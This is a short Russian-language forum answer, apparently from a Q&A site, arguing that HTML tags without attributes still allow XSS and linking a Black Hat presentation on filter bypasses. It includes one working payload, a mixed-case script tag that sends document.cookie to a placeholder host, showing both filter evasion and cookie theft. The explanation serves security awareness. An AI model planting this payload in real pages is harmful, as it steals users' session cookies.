Безопасны ли теги HTML XSS, если они не имеют атрибутов?
Нет.
<ScrIPT>(new Image).src = 'http://nasty/log?s=' + document.cookie;</SCRipT>
Моя позиция здесь ... как вы собираетесь обнаружить, что у них нет атрибутов? Можно сгенерировать специальный HTML-код, который выполняет Javascript в браузере и обходить фильтры, проверяя атрибуты.
Посмотрите на эту презентацию http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf
В любом случае, если вы хотите получить ответ да / нет, мой ответ НЕТ:)
Что касается и